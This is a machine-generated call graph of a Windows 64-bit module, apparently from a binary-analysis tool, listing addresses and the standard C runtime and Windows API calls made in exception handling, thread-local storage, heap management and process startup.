7ff8b805a243 8066->8067 8068 7ff8b805a247 8067->8068 8069 7ff8b805a226 DeleteCriticalSection 8067->8069 8068->8064 8069->8067 7396 7ff8b8052530 7397 7ff8b805254c 7396->7397 7398 7ff8b8052551 7396->7398 7400 7ff8b8052834 7397->7400 7401 7ff8b80528cb 7400->7401 7402 7ff8b8052857 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7400->7402 7401->7398 7402->7401 8070 7ff8b80529b0 8077 7ff8b80541b0 8070->8077 8075 7ff8b80529bd 8078 7ff8b805463c _CallSETranslator 22 API calls 8077->8078 8079 7ff8b80529b9 8078->8079 8079->8075 8080 7ff8b80596ec 8079->8080 8081 7ff8b8059ec0 BuildCatchObjectHelperInternal 11 API calls 8080->8081 8082 7ff8b80529c6 8081->8082 8082->8075 8083 7ff8b80541c4 8082->8083 8086 7ff8b80545d8 8083->8086 8087 7ff8b80545e9 8086->8087 8088 7ff8b80541cd 8086->8088 8089 7ff8b8057b2c _CallSETranslator 6 API calls 8087->8089 8088->8075 8090 7ff8b80545ee 8089->8090 8094 7ff8b8057b74 8090->8094 8093 7ff8b8058978 __std_exception_destroy 13 API calls 8093->8088 8095 7ff8b805794c __vcrt_InitializeCriticalSectionEx 5 API calls 8094->8095 8096 7ff8b8057ba2 8095->8096 8097 7ff8b8057bb4 TlsSetValue 8096->8097 8098 7ff8b80545fe 8096->8098 8097->8098 8098->8088 8098->8093 7403 7ff8b8061730 7404 7ff8b8061768 __GSHandlerCheckCommon 7403->7404 7405 7ff8b8061794 7404->7405 7407 7ff8b8053b58 7404->7407 7408 7ff8b8054620 _CallSETranslator 58 API calls 7407->7408 7409 7ff8b8053b82 7408->7409 7410 7ff8b8054620 _CallSETranslator 58 API calls 7409->7410 7411 7ff8b8053b8f 7410->7411 7412 7ff8b8054620 _CallSETranslator 58 API calls 7411->7412 7413 7ff8b8053b98 7412->7413 7413->7405 8099 7ff8b80617b0 8109 7ff8b8053f3c 8099->8109 8101 7ff8b80617d8 8103 7ff8b8054620 _CallSETranslator 58 API calls 8104 7ff8b80617e8 8103->8104 8105 7ff8b8054620 _CallSETranslator 58 API calls 8104->8105 8106 7ff8b80617f1 8105->8106 8107 7ff8b8059758 __GSHandlerCheck_EH 47 API calls 8106->8107 8108 7ff8b80617fa 8107->8108 8110 7ff8b8053f6c _IsNonwritableInCurrentImage __GSHandlerCheck_SEH __except_validate_context_record 8109->8110 8111 7ff8b805405d 8110->8111 8112 7ff8b8054028 RtlUnwindEx 8110->8112 8111->8101 8111->8103 8112->8110 8506 7ff8b8061c32 8507 7ff8b8061cb5 8506->8507 8508 7ff8b8061c4a 8506->8508 8508->8507 8509 7ff8b8054620 _CallSETranslator 58 API calls 8508->8509 8510 7ff8b8061c97 8509->8510 8511 7ff8b8054620 _CallSETranslator 58 API calls 8510->8511 8512 7ff8b8061cac 8511->8512 8513 7ff8b8059758 __GSHandlerCheck_EH 47 API calls 8512->8513 8513->8507 8514 7ff8b8056c1d 8515 7ff8b8054620 _CallSETranslator 58 API calls 8514->8515 8516 7ff8b8056c2a 8515->8516 8517 7ff8b8054620 _CallSETranslator 58 API calls 8516->8517 8519 7ff8b8056c33 __CxxCallCatchBlock 8517->8519 8518 7ff8b8056c7a RaiseException 8520 7ff8b8056c99 8518->8520 8519->8518 8521 7ff8b8053aac __CxxCallCatchBlock 58 API calls 8520->8521 8526 7ff8b8056ca1 8521->8526 8522 7ff8b8056cca __CxxCallCatchBlock 8523 7ff8b8054620 _CallSETranslator 58 API calls 8522->8523 8524 7ff8b8056cdd 8523->8524 8525 7ff8b8054620 _CallSETranslator 58 API calls 8524->8525 8527 7ff8b8056ce6 8525->8527 8526->8522 8528 7ff8b8053d14 __CxxCallCatchBlock 58 API calls 8526->8528 8529 7ff8b8054620 _CallSETranslator 58 API calls 8527->8529 8528->8522 8530 7ff8b8056cef 8529->8530 8531 7ff8b8054620 _CallSETranslator 58 API calls 8530->8531 8532 7ff8b8056cfe 8531->8532 8113 7ff8b8052998 8116 7ff8b8052ae0 8113->8116 8115 7ff8b80529a3 8117 7ff8b8052af1 8116->8117 8120 7ff8b8052af6 __scrt_acquire_startup_lock 8116->8120 8117->8120 8121 7ff8b8052c64 IsProcessorFeaturePresent 8117->8121 8119 7ff8b8052b6a 8120->8115 8122 7ff8b8052c8a _invalid_parameter_noinfo_noreturn 8121->8122 8123 7ff8b8052ca9 RtlCaptureContext RtlLookupFunctionEntry 8122->8123 8124 7ff8b8052d0e _invalid_parameter_noinfo_noreturn 8123->8124 8125 7ff8b8052cd2 RtlVirtualUnwind 8123->8125 8126 7ff8b8052d40 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8124->8126 8125->8124 8127 7ff8b8052d92 _invalid_parameter_noinfo_noreturn 8126->8127 8127->8119 8128 7ff8b8057398 8130 7ff8b8057254 __CxxCallCatchBlock __GSHandlerCheck_EH 8128->8130 8129 7ff8b80573b8 8131 7ff8b8054620 _CallSETranslator 58 API calls 8129->8131 8130->8129 8137 7ff8b8053b28 __FrameHandler3::FrameUnwindToEmptyState 58 API calls 8130->8137 8132 7ff8b80573bd 8131->8132 8133 7ff8b8054620 _CallSETranslator 58 API calls 8132->8133 8135 7ff8b80573c8 8132->8135 8133->8135 8134 7ff8b8052180 _log10_special 8 API calls 8136 7ff8b80573db 8134->8136 8135->8134 8137->8130 7414 7ff8b805a124 7417 7ff8b805a0a8 7414->7417 7424 7ff8b805a1fc EnterCriticalSection 7417->7424 8533 7ff8b8058c21 8534 7ff8b8059758 __GSHandlerCheck_EH 47 API calls 8533->8534 8535 7ff8b8058c26 8534->8535 8536 7ff8b8058c4d GetModuleHandleW 8535->8536 8537 7ff8b8058c97 8535->8537 8536->8537 8542 7ff8b8058c5a 8536->8542 8550 7ff8b8058b24 8537->8550 8542->8537 8545 7ff8b8058d48 GetModuleHandleExW 8542->8545 8546 7ff8b8058d7c GetProcAddress 8545->8546 8547 7ff8b8058d8e 8545->8547 8546->8547 8548 7ff8b8058daa FreeLibrary 8547->8548 8549 7ff8b8058db1 8547->8549 8548->8549 8549->8537 8564 7ff8b805a1fc EnterCriticalSection 8550->8564 8138 7ff8b805e9a0 8139 7ff8b805b988 67 API calls 8138->8139 8140 7ff8b805e9a9 8139->8140 7425 7ff8b805bd4c GetCommandLineA GetCommandLineW 8575 7ff8b8061e4f 8578 7ff8b8053d68 8575->8578 8579 7ff8b8053d80 8578->8579 8580 7ff8b8053d92 8578->8580 8579->8580 8581 7ff8b8053d88 8579->8581 8582 7ff8b8054620 _CallSETranslator 58 API calls 8580->8582 8584 7ff8b8053d90 8581->8584 8585 7ff8b8054620 _CallSETranslator 58 API calls 8581->8585 8583 7ff8b8053d97 8582->8583 8583->8584 8586 7ff8b8054620 _CallSETranslator 58 API calls 8583->8586 8587 7ff8b8053db7 8585->8587 8586->8584 8588 7ff8b8054620 _CallSETranslator 58 API calls 8587->8588 8589 7ff8b8053dc4 8588->8589 8590 7ff8b8059758 __GSHandlerCheck_EH 47 API calls 8589->8590 8591 7ff8b8053dcd 8590->8591 8592 7ff8b8059758 __GSHandlerCheck_EH 47 API calls 8591->8592 8593 7ff8b8053dd9 8592->8593 8594 7ff8b805a048 8595 7ff8b805a058 8594->8595 8596 7ff8b8059ec0 BuildCatchObjectHelperInternal 11 API calls 8595->8596 8597 7ff8b805a063 __vcrt_uninitialize_ptd 8595->8597 8596->8597 8734 7ff8b8061cc8 8735 7ff8b8054620 _CallSETranslator 58 API calls 8734->8735 8736 7ff8b8061cd6 8735->8736 8598 7ff8b8052a50 8599 7ff8b8052a59 __scrt_acquire_startup_lock 8598->8599 8602 7ff8b8052a6d 8599->8602 8603 7ff8b80593e0 8599->8603 8610 7ff8b805a1fc EnterCriticalSection 8603->8610 8737 7ff8b8056ad0 8738 7ff8b8054620 _CallSETranslator 58 API calls 8737->8738 8739 7ff8b8056b1d 8738->8739 8740 7ff8b8054620 _CallSETranslator 58 API calls 8739->8740 8741 7ff8b8056b2b __except_validate_context_record 8740->8741 8742 7ff8b8054620 _CallSETranslator 58 API calls 8741->8742 8743 7ff8b8056b84 8742->8743 8744 7ff8b8054620 _CallSETranslator 58 API calls 8743->8744 8745 7ff8b8056b8d 8744->8745 8746 7ff8b8054620 _CallSETranslator 58 API calls 8745->8746 8747 7ff8b8056b96 8746->8747 8768 7ff8b8053a70 8747->8768 8750 7ff8b8056bc9 8752 7ff8b8056d19 8750->8752 8753 7ff8b8056c01 8750->8753 8751 7ff8b8054620 _CallSETranslator 58 API calls 8751->8750 8754 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 8752->8754 8756 7ff8b8053aac __CxxCallCatchBlock 58 API calls 8753->8756 8755 7ff8b8056d1e 8754->8755 8761 7ff8b8056ca1 8756->8761 8757 7ff8b8056cca __CxxCallCatchBlock 8758 7ff8b8054620 _CallSETranslator 58 API calls 8757->8758 8759 7ff8b8056cdd 8758->8759 8760 7ff8b8054620 _CallSETranslator 58 API calls 8759->8760 8762 7ff8b8056ce6 8760->8762 8761->8757 8763 7ff8b8053d14 __CxxCallCatchBlock 58 API calls 8761->8763 8764 7ff8b8054620 _CallSETranslator 58 API calls 8762->8764 8763->8757 8765 7ff8b8056cef 8764->8765 8766 7ff8b8054620 _CallSETranslator 58 API calls 8765->8766 8767 7ff8b8056cfe 8766->8767 8769 7ff8b8054620 _CallSETranslator 58 API calls 8768->8769 8770 7ff8b8053a81 8769->8770 8771 7ff8b8054620 _CallSETranslator 58 API calls 8770->8771 8772 7ff8b8053a8c 8770->8772 8771->8772 8773 7ff8b8054620 _CallSETranslator 58 API calls 8772->8773 8774 7ff8b8053a9d 8773->8774 8774->8750 8774->8751 8141 7ff8b805dbd0 8142 7ff8b805dbfd 8141->8142 8143 7ff8b805a3e0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8142->8143 8148 7ff8b805dc12 8142->8148 8144 7ff8b805dc07 8143->8144 8145 7ff8b80587cc _invalid_parameter_noinfo 47 API calls 8144->8145 8145->8148 8146 7ff8b8052180 _log10_special 8 API calls 8147 7ff8b805dfd0 8146->8147 8148->8146 8775 7ff8b805e0d0 8776 7ff8b805e0ef 8775->8776 8777 7ff8b805e168 8776->8777 8780 7ff8b805e0ff 8776->8780 8783 7ff8b8052678 8777->8783 8781 7ff8b8052180 _log10_special 8 API calls 8780->8781 8782 7ff8b805e15e 8781->8782 8786 7ff8b805268c IsProcessorFeaturePresent 8783->8786 8787 7ff8b80526a3 8786->8787 8792 7ff8b8052728 RtlCaptureContext RtlLookupFunctionEntry 8787->8792 8793 7ff8b8052758 RtlVirtualUnwind 8792->8793 8794 7ff8b80526b7 8792->8794 8793->8794 8795 7ff8b8052570 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8794->8795 8611 7ff8b805963c 8612 7ff8b8059655 8611->8612 8613 7ff8b805966d 8611->8613 8612->8613 8614 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8612->8614 8614->8613 8615 7ff8b806163c 8616 7ff8b806167e __GSHandlerCheckCommon 8615->8616 8617 7ff8b80616a6 8616->8617 8618 7ff8b8053f3c __GSHandlerCheck_SEH RtlUnwindEx 8616->8618 8618->8617 8149 7ff8b8061dbe 8150 7ff8b8053aac __CxxCallCatchBlock 58 API calls 8149->8150 8152 7ff8b8061dd1 8150->8152 8151 7ff8b8054620 _CallSETranslator 58 API calls 8153 7ff8b8061e24 8151->8153 8155 7ff8b8053d14 __CxxCallCatchBlock 58 API calls 8152->8155 8157 7ff8b8061e10 __CxxCallCatchBlock 8152->8157 8154 7ff8b8054620 _CallSETranslator 58 API calls 8153->8154 8156 7ff8b8061e31 8154->8156 8155->8157 8158 7ff8b8054620 _CallSETranslator 58 API calls 8156->8158 8157->8151 8159 7ff8b8061e3e 8158->8159 8160 7ff8b80545b8 8161 7ff8b80545c1 8160->8161 8162 7ff8b80545d2 8160->8162 8161->8162 8163 7ff8b8058978 __std_exception_destroy 13 API calls 8161->8163 8163->8162 8164 7ff8b80601eb 8165 7ff8b806022b 8164->8165 8166 7ff8b8060490 8164->8166 8165->8166 8168 7ff8b806025f 8165->8168 8169 7ff8b8060472 8165->8169 8167 7ff8b8060486 8166->8167 8171 7ff8b8060fa0 _log10_special 20 API calls 8166->8171 8172 7ff8b8060fa0 8169->8172 8171->8167 8175 7ff8b8060fc0 8172->8175 8176 7ff8b8060fda 8175->8176 8177 7ff8b8060fbb 8176->8177 8179 7ff8b8060e00 8176->8179 8177->8167 8180 7ff8b8060e40 _log10_special 8179->8180 8183 7ff8b8060eac _log10_special 8180->8183 8190 7ff8b80610c0 8180->8190 8182 7ff8b8060ee9 8197 7ff8b80613f0 8182->8197 8183->8182 8184 7ff8b8060eb9 8183->8184 8193 7ff8b8060cdc 8184->8193 8187 7ff8b8060ee7 _log10_special 8188 7ff8b8052180 _log10_special 8 API calls 8187->8188 8189 7ff8b8060f11 8188->8189 8189->8177 8203 7ff8b80610e8 8190->8203 8194 7ff8b8060d20 _log10_special 8193->8194 8195 7ff8b8060d35 8194->8195 8196 7ff8b80613f0 _log10_special 11 API calls 8194->8196 8195->8187 8196->8195 8198 7ff8b80613f9 8197->8198 8199 7ff8b8061410 8197->8199 8201 7ff8b8061408 8198->8201 8202 7ff8b805a3e0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8198->8202 8200 7ff8b805a3e0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8199->8200 8200->8201 8201->8187 8202->8201 8204 7ff8b8061127 _raise_exc _clrfp 8203->8204 8205 7ff8b806133c RaiseException 8204->8205 8206 7ff8b80610e2 8205->8206 8206->8183 8207 7ff8b805bff4 8208 7ff8b805c016 8207->8208 8209 7ff8b805c033 8207->8209 8208->8209 8210 7ff8b805c024 8208->8210 8211 7ff8b805c03d 8209->8211 8216 7ff8b805e9b8 8209->8216 8212 7ff8b805a3e0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8210->8212 8223 7ff8b805e9f4 8211->8223 8215 7ff8b805c029 _invalid_parameter_noinfo_noreturn 8212->8215 8217 7ff8b805e9da HeapSize 8216->8217 8218 7ff8b805e9c1 8216->8218 8219 7ff8b805a3e0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8218->8219 8220 7ff8b805e9c6 8219->8220 8221 7ff8b80587cc _invalid_parameter_noinfo 47 API calls 8220->8221 8222 7ff8b805e9d1 8221->8222 8222->8211 8224 7ff8b805ea09 8223->8224 8225 7ff8b805ea13 8223->8225 8226 7ff8b805a154 12 API calls 8224->8226 8227 7ff8b805ea18 8225->8227 8233 7ff8b805ea1f BuildCatchObjectHelperInternal 8225->8233 8231 7ff8b805ea11 8226->8231 8228 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8227->8228 8228->8231 8229 7ff8b805ea25 8232 7ff8b805a3e0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8229->8232 8230 7ff8b805ea52 HeapReAlloc 8230->8231 8230->8233 8231->8215 8232->8231 8233->8229 8233->8230 8234 7ff8b8058874 BuildCatchObjectHelperInternal 2 API calls 8233->8234 8234->8233 8235 7ff8b80529f0 8236 7ff8b8052a14 __scrt_acquire_startup_lock 8235->8236 8237 7ff8b8058995 8236->8237 8238 7ff8b8059ec0 BuildCatchObjectHelperInternal 11 API calls 8236->8238 8239 7ff8b80589be 8238->8239 8619 7ff8b8051e70 8620 7ff8b8051e83 8619->8620 8621 7ff8b8051ea7 8619->8621 8620->8621 8622 7ff8b80587ec _invalid_parameter_noinfo_noreturn 47 API calls 8620->8622 8623 7ff8b8051ecd 8622->8623 8799 7ff8b80528f0 8800 7ff8b805415c InterlockedFlushSList 8799->8800 8801 7ff8b805416d 8800->8801 8802 7ff8b8054180 8800->8802 8801->8802 8803 7ff8b8058978 __std_exception_destroy 13 API calls 8801->8803 8803->8801 8240 7ff8b80569de 8241 7ff8b8054620 _CallSETranslator 58 API calls 8240->8241 8243 7ff8b80569eb __CxxCallCatchBlock 8241->8243 8242 7ff8b8056a2f RaiseException 8244 7ff8b8056a56 8242->8244 8243->8242 8245 7ff8b8053aac __CxxCallCatchBlock 58 API calls 8244->8245 8248 7ff8b8056a5e 8245->8248 8246 7ff8b8054620 _CallSETranslator 58 API calls 8247 7ff8b8056a9a 8246->8247 8249 7ff8b8054620 _CallSETranslator 58 API calls 8247->8249 8250 7ff8b8053d14 __CxxCallCatchBlock 58 API calls 8248->8250 8252 7ff8b8056a87 __CxxCallCatchBlock 8248->8252 8251 7ff8b8056aa3 8249->8251 8250->8252 8252->8246 8804 7ff8b8061ade 8805 7ff8b8054620 _CallSETranslator 58 API calls 8804->8805 8806 7ff8b8061af6 8805->8806 8807 7ff8b8054620 _CallSETranslator 58 API calls 8806->8807 8808 7ff8b8061b11 8807->8808 8809 7ff8b8054620 _CallSETranslator 58 API calls 8808->8809 8810 7ff8b8061b25 8809->8810 8811 7ff8b8054620 _CallSETranslator 58 API calls 8810->8811 8812 7ff8b8061b67 8811->8812 8253 7ff8b80529d8 8258 7ff8b8059700 8253->8258 8256 7ff8b80541c4 20 API calls 8257 7ff8b80529e6 8256->8257 8261 7ff8b8059d04 8258->8261 8262 7ff8b80529e1 8261->8262 8263 7ff8b8059d15 FlsGetValue 8261->8263 8262->8256 8263->8262 8264 7ff8b8059d22 FlsSetValue 8263->8264 8265 7ff8b8059ba4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8264->8265 8266 7ff8b8059d37 8265->8266 8267 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8266->8267 8267->8262 8268 7ff8b80609d8 8269 7ff8b80609ef 8268->8269 8270 7ff8b80609e9 CloseHandle 8268->8270 8270->8269 8813 7ff8b80618d8 8814 7ff8b8061910 __GSHandlerCheckCommon 8813->8814 8815 7ff8b806193c 8814->8815 8817 7ff8b8053be0 8814->8817 8818 7ff8b8054620 _CallSETranslator 58 API calls 8817->8818 8819 7ff8b8053c22 8818->8819 8820 7ff8b8054620 _CallSETranslator 58 API calls 8819->8820 8821 7ff8b8053c2f 8820->8821 8822 7ff8b8054620 _CallSETranslator 58 API calls 8821->8822 8823 7ff8b8053c38 __GSHandlerCheck_EH 8822->8823 8824 7ff8b80566d4 __GSHandlerCheck_EH 62 API calls 8823->8824 8825 7ff8b8053c89 8824->8825 8825->8815 6683 7ff8b8052964 6684 7ff8b805296d __scrt_acquire_startup_lock 6683->6684 6686 7ff8b8052971 6684->6686 6687 7ff8b805900c 6684->6687 6688 7ff8b805902c 6687->6688 6689 7ff8b8059043 6687->6689 6690 7ff8b805904a 6688->6690 6691 7ff8b8059034 6688->6691 6689->6686 6725 7ff8b805b988 6690->6725 6719 7ff8b805a3e0 6691->6719 6703 7ff8b80590d9 6705 7ff8b8058de4 47 API calls 6703->6705 6704 7ff8b80590c1 6706 7ff8b805a3e0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 6704->6706 6712 7ff8b80590f5 6705->6712 6707 7ff8b80590c6 6706->6707 6755 7ff8b805a26c 6707->6755 6708 7ff8b80590fb 6711 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 6708->6711 6710 7ff8b80590d4 6710->6689 6711->6689 6712->6708 6713 7ff8b8059127 6712->6713 6714 7ff8b8059140 6712->6714 6715 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 6713->6715 6717 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 6714->6717 6716 7ff8b8059130 6715->6716 6718 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 6716->6718 6717->6708 6718->6710 6761 7ff8b8059ec0 GetLastError 6719->6761 6721 7ff8b8059039 6722 7ff8b80587cc 6721->6722 6813 7ff8b8058664 6722->6813 6726 7ff8b805b995 6725->6726 6730 7ff8b805904f 6725->6730 6965 7ff8b8059e1c 6726->6965 6731 7ff8b805b06c GetModuleFileNameW 6730->6731 6732 7ff8b805b0c5 6731->6732 6733 7ff8b805b0b1 GetLastError 6731->6733 6735 7ff8b805aeac 47 API calls 6732->6735 7183 7ff8b805a354 6733->7183 6737 7ff8b805b0f3 6735->6737 6736 7ff8b805b0be 6739 7ff8b8052180 _log10_special 8 API calls 6736->6739 6742 7ff8b805b104 6737->6742 7188 7ff8b805c2a0 6737->7188 6741 7ff8b8059066 6739->6741 6743 7ff8b8058de4 6741->6743 7191 7ff8b805af50 6742->7191 6745 7ff8b8058e22 6743->6745 6747 7ff8b8058e8e 6745->6747 7205 7ff8b805bd38 6745->7205 6746 7ff8b8058f7f 6749 7ff8b8058fac 6746->6749 6747->6746 6748 7ff8b805bd38 47 API calls 6747->6748 6748->6747 6750 7ff8b8058fc4 6749->6750 6751 7ff8b8058ffc 6749->6751 6750->6751 6752 7ff8b805a400 BuildCatchObjectHelperInternal 11 API calls 6750->6752 6751->6703 6751->6704 6753 7ff8b8058ff2 6752->6753 6754 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 6753->6754 6754->6751 6756 7ff8b805a2a2 6755->6756 6757 7ff8b805a271 HeapFree 6755->6757 6756->6710 6757->6756 6758 7ff8b805a28c GetLastError 6757->6758 6759 7ff8b805a299 Concurrency::details::SchedulerProxy::DeleteThis 6758->6759 6760 7ff8b805a3e0 Concurrency::details::SchedulerProxy::DeleteThis 9 API calls 6759->6760 6760->6756 6762 7ff8b8059f01 FlsSetValue 6761->6762 6766 7ff8b8059ee4 6761->6766 6763 7ff8b8059f13 6762->6763 6767 7ff8b8059ef1 SetLastError 6762->6767 6778 7ff8b805a400 6763->6778 6766->6762 6766->6767 6767->6721 6768 7ff8b8059f22 6769 7ff8b8059f40 FlsSetValue 6768->6769 6770 7ff8b8059f30 FlsSetValue 6768->6770 6772 7ff8b8059f4c FlsSetValue 6769->6772 6773 7ff8b8059f5e 6769->6773 6771 7ff8b8059f39 6770->6771 6774 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6771->6774 6772->6771 6785 7ff8b8059ab4 6773->6785 6774->6767 6783 7ff8b805a411 BuildCatchObjectHelperInternal 6778->6783 6779 7ff8b805a462 6782 7ff8b805a3e0 Concurrency::details::SchedulerProxy::DeleteThis 10 API calls 6779->6782 6780 7ff8b805a446 HeapAlloc 6781 7ff8b805a460 6780->6781 6780->6783 6781->6768 6782->6781 6783->6779 6783->6780 6790 7ff8b8058874 6783->6790 6799 7ff8b805998c 6785->6799 6793 7ff8b80588b4 6790->6793 6798 7ff8b805a1fc EnterCriticalSection 6793->6798 6811 7ff8b805a1fc EnterCriticalSection 6799->6811 6814 7ff8b805868f 6813->6814 6821 7ff8b8058700 6814->6821 6817 7ff8b80586d9 6818 7ff8b80586ee 6817->6818 6820 7ff8b80583e0 _invalid_parameter_noinfo 47 API calls 6817->6820 6818->6689 6820->6818 6840 7ff8b8058448 6821->6840 6825 7ff8b80586b6 6825->6817 6831 7ff8b80583e0 6825->6831 6832 7ff8b8058433 6831->6832 6833 7ff8b80583f3 GetLastError 6831->6833 6832->6817 6834 7ff8b8058403 6833->6834 6835 7ff8b8059f88 _invalid_parameter_noinfo 16 API calls 6834->6835 6836 7ff8b805841e SetLastError 6835->6836 6836->6832 6837 7ff8b8058441 6836->6837 6892 7ff8b8059784 6837->6892 6841 7ff8b805849f 6840->6841 6842 7ff8b8058464 GetLastError 6840->6842 6841->6825 6846 7ff8b80584b4 6841->6846 6843 7ff8b8058474 6842->6843 6853 7ff8b8059f88 6843->6853 6847 7ff8b80584e8 6846->6847 6848 7ff8b80584d0 GetLastError SetLastError 6846->6848 6847->6825 6849 7ff8b805881c IsProcessorFeaturePresent 6847->6849 6848->6847 6850 7ff8b805882f 6849->6850 6870 7ff8b8058500 6850->6870 6854 7ff8b8059fa7 FlsGetValue 6853->6854 6855 7ff8b8059fc2 FlsSetValue 6853->6855 6856 7ff8b8059fbc 6854->6856 6858 7ff8b805848f SetLastError 6854->6858 6857 7ff8b8059fcf 6855->6857 6855->6858 6856->6855 6859 7ff8b805a400 BuildCatchObjectHelperInternal 11 API calls 6857->6859 6858->6841 6860 7ff8b8059fde 6859->6860 6861 7ff8b8059ffc FlsSetValue 6860->6861 6862 7ff8b8059fec FlsSetValue 6860->6862 6864 7ff8b805a008 FlsSetValue 6861->6864 6865 7ff8b805a01a 6861->6865 6863 7ff8b8059ff5 6862->6863 6866 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 6863->6866 6864->6863 6867 7ff8b8059ab4 BuildCatchObjectHelperInternal 11 API calls 6865->6867 6866->6858 6868 7ff8b805a022 6867->6868 6869 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 6868->6869 6869->6858 6871 7ff8b805853a _invalid_parameter_noinfo_noreturn 6870->6871 6872 7ff8b8058562 RtlCaptureContext RtlLookupFunctionEntry 6871->6872 6873 7ff8b805859c RtlVirtualUnwind 6872->6873 6874 7ff8b80585d2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6872->6874 6873->6874 6875 7ff8b8058624 _invalid_parameter_noinfo_noreturn 6874->6875 6878 7ff8b8052180 6875->6878 6879 7ff8b8052189 6878->6879 6880 7ff8b80525a4 IsProcessorFeaturePresent 6879->6880 6881 7ff8b8052194 GetCurrentProcess TerminateProcess 6879->6881 6882 7ff8b80525bc 6880->6882 6887 7ff8b8052798 RtlCaptureContext 6882->6887 6888 7ff8b80527b2 RtlLookupFunctionEntry 6887->6888 6889 7ff8b80527c8 RtlVirtualUnwind 6888->6889 6890 7ff8b80525cf 6888->6890 6889->6888 6889->6890 6891 7ff8b8052570 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6890->6891 6908 7ff8b805c8e8 6892->6908 6934 7ff8b805c8a0 6908->6934 6939 7ff8b805a1fc EnterCriticalSection 6934->6939 6966 7ff8b8059e2d FlsGetValue 6965->6966 6967 7ff8b8059e48 FlsSetValue 6965->6967 6968 7ff8b8059e3a 6966->6968 6970 7ff8b8059e42 6966->6970 6967->6968 6969 7ff8b8059e55 6967->6969 6971 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 6968->6971 6973 7ff8b8059e40 6968->6973 6972 7ff8b805a400 BuildCatchObjectHelperInternal 11 API calls 6969->6972 6970->6967 6974 7ff8b8059ebd 6971->6974 6975 7ff8b8059e64 6972->6975 6985 7ff8b805b660 6973->6985 6976 7ff8b8059e82 FlsSetValue 6975->6976 6977 7ff8b8059e72 FlsSetValue 6975->6977 6979 7ff8b8059e8e FlsSetValue 6976->6979 6980 7ff8b8059ea0 6976->6980 6978 7ff8b8059e7b 6977->6978 6981 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 6978->6981 6979->6978 6982 7ff8b8059ab4 BuildCatchObjectHelperInternal 11 API calls 6980->6982 6981->6968 6983 7ff8b8059ea8 6982->6983 6984 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 6983->6984 6984->6973 7008 7ff8b805b8d0 6985->7008 6987 7ff8b805b695 7023 7ff8b805b360 6987->7023 6990 7ff8b805b6b2 6990->6730 6993 7ff8b805b6cb 6994 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 6993->6994 6994->6990 6995 7ff8b805b6da 6995->6995 7037 7ff8b805ba04 6995->7037 6998 7ff8b805b7d6 6999 7ff8b805a3e0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 6998->6999 7001 7ff8b805b7db 6999->7001 7000 7ff8b805b831 7003 7ff8b805b898 7000->7003 7048 7ff8b805b190 7000->7048 7004 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7001->7004 7002 7ff8b805b7f0 7002->7000 7005 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7002->7005 7007 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7003->7007 7004->6990 7005->7000 7007->6990 7009 7ff8b805b8f3 7008->7009 7010 7ff8b805b8fd 7009->7010 7063 7ff8b805a1fc EnterCriticalSection 7009->7063 7013 7ff8b805b96f 7010->7013 7015 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 7010->7015 7013->6987 7016 7ff8b805b987 7015->7016 7019 7ff8b805b9da 7016->7019 7020 7ff8b8059e1c 52 API calls 7016->7020 7019->6987 7021 7ff8b805b9c4 7020->7021 7022 7ff8b805b660 67 API calls 7021->7022 7022->7019 7064 7ff8b805aeac 7023->7064 7026 7ff8b805b380 GetOEMCP 7029 7ff8b805b3a7 7026->7029 7027 7ff8b805b392 7028 7ff8b805b397 GetACP 7027->7028 7027->7029 7028->7029 7029->6990 7030 7ff8b805a154 7029->7030 7031 7ff8b805a19f 7030->7031 7035 7ff8b805a163 BuildCatchObjectHelperInternal 7030->7035 7033 7ff8b805a3e0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7031->7033 7032 7ff8b805a186 HeapAlloc 7034 7ff8b805a19d 7032->7034 7032->7035 7033->7034 7034->6993 7034->6995 7035->7031 7035->7032 7036 7ff8b8058874 BuildCatchObjectHelperInternal 2 API calls 7035->7036 7036->7035 7038 7ff8b805b360 49 API calls 7037->7038 7039 7ff8b805ba31 7038->7039 7040 7ff8b805bb87 7039->7040 7042 7ff8b805ba6e IsValidCodePage 7039->7042 7046 7ff8b805ba88 _invalid_parameter_noinfo_noreturn 7039->7046 7041 7ff8b8052180 _log10_special 8 API calls 7040->7041 7043 7ff8b805b7cd 7041->7043 7042->7040 7044 7ff8b805ba7f 7042->7044 7043->6998 7043->7002 